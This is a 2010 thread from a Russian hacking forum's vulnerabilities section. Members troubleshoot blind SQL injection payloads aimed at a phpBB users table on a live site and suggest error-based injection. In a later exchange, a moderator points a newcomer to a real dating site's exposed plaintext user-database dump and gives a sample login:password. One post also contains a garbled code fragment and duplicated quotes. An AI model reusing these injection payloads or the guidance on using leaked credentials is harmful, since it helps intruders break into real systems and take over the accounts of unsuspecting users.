HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.12.2010, 21:48
cipa21
Новичок
Регистрация: 09.04.2009
Сообщений: 8
С нами: 8994048

Репутация: 0
По умолчанию

Цитата:
Сообщение от попугай  
http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.
Подозрительно все это, такой ресурс хороший...Ну все равно спасибо за ответ!
 
Ответить с цитированием

  #2  
Старый 26.12.2010, 21:52
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
С нами: 10358246

Репутация: 378
По умолчанию

делаю запрос (id*IF(ASCII(SUBSTRING(version(),1,1))=53,1,-1)) все ок, ясно что версия 5

но когда пытаюсь выбрать из базы:

(id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1 ,1))=53,1,-1))

вылазит ошибка

Invalid SQL: SELECT * FROM `arts` WHERE id = (id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1 ,1))=53,1,-1))

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select+1+from+phpbb_users,1,1))=53,1,-1))' at line 1

в чем проблема?
 
Ответить с цитированием

  #3  
Старый 26.12.2010, 21:58
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

InferNo23

подзапрос select надо взять в скобки

SUBSTRING((select+1+from+phpbb_users+limit+0,1),1 ,1))=53,1,-1))
 
Ответить с цитированием

  #4  
Старый 26.12.2010, 22:14
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
С нами: 10358246

Репутация: 378
По умолчанию

Цитата:
Сообщение от Konqi  
InferNo23
подзапрос select надо взять в скобки
SUBSTRING(
(
select+1+from+phpbb_users+limit+0,1
)
,1 ,1))=53,1,-1))
(id*IF(ASCII(SUBSTRING((select+1+from+phpbb_users+ limit+0,1),1,1))=53,1,-1))

теперь

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from+phpbb_users+limit+0,1),1,1))=53,1,-1))' at line 1
 
Ответить с цитированием

  #5  
Старый 26.12.2010, 22:15
DesCent
Участник форума
Регистрация: 09.07.2010
Сообщений: 276
С нами: 8338646

Репутация: 16
По умолчанию

Цитата:
Сообщение от None  
Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...
Цитата:
Сообщение от None  
http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.
" if author else f"
Цитата:
Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...
Цитата:
Сообщение от None  
http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.
Вродь дернули на 1337db.com, но сайт тоже не отвечает.

Следите за ихним твиттером, возможно, объявятся еще.
 
Ответить с цитированием

  #6  
Старый 26.12.2010, 22:25
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

InferNo23

так закрытыми глазами ниче сказать не могу, если не жалко скинь сайт, посмотрим.

ах да забыл сказать, если там видна ошибка мускула, ты не пробовал проводить error based иньекцию?

зачем посимвольно..
 
Ответить с цитированием

  #7  
Старый 27.12.2010, 15:26
Dagger
Новичок
Регистрация: 07.10.2010
Сообщений: 0
С нами: 8209046

Репутация: 0
По умолчанию

http://www.tringuladating.com//db/

Что это, и с чем его едят-))) Просьба не смеяться- я учусь только.
 
Ответить с цитированием

  #8  
Старый 27.12.2010, 15:35
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
С нами: 10139306

Репутация: 1089


По умолчанию

Цитата:
Сообщение от Dagger  
http://www.tringuladating.com//db/
Что это, и с чем его едят-))) Просьба не смеяться- я учусь только.
странно- там дамп БД юзерей в плейнтексте trindating_user.sql.gz скачивай и заходи под любым ну как пример meetmeone:meetmeone ,у большинства пароль просто password из чего делаем вывод что наполнял его сам админ и больше полофины юзерей- фейки
 
Ответить с цитированием

  #9  
Старый 27.12.2010, 15:42
Dagger
Новичок
Регистрация: 07.10.2010
Сообщений: 0
С нами: 8209046

Репутация: 0
По умолчанию

Цитата:
Сообщение от Kusto  
странно- там дамп БД юзерей в плейнтексте
trindating_user.sql.gz скачивай и заходи под любым ну как пример meetmeone:meetmeone
А чем и как правильно скачать? Он то и блокнотом открывается, но как то в перемешку, как его обработать?
 
Ответить с цитированием

  #10  
Старый 27.12.2010, 15:52
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от Dagger  
А чем и как правильно скачать? Он то и блокнотом открывается, но как то в перемешку, как его обработать?
тебе сколько лет дитё? распечатай на принтере все, раз дамп открыть не можешь

ЗЫ. потом маркером будешь подчеркивать, зеленым логины и красным пароли..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.